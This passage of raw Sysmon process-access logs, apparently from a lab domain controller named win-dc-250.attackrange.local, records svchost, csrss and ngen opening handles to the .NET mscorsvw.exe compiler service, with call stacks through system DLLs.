ERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.018{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-1203-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.003{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.003{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.987{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}3976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.987{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.987{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}3976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.971{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-1003-000000009A01}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.956{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.956{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.940{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-0F03-000000009A01}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.924{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.924{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.909{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}4340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.909{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.909{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:00.659{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44E3-6000-3401-000000009A01}728C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:00.659{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45F0-6000-3503-000000009A01}1828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:00.487{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45F0-6000-3503-000000009A01}1828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:00.487{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-45F0-6000-3503-000000009A01}1828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:01.471{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45F1-6000-3703-000000009A01}4800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:01.456{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45F1-6000-3703-000000009A01}4800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:01.456{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-45F1-6000-3703-000000009A01}4800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:01.253{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45F1-6000-3603-000000009A01}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 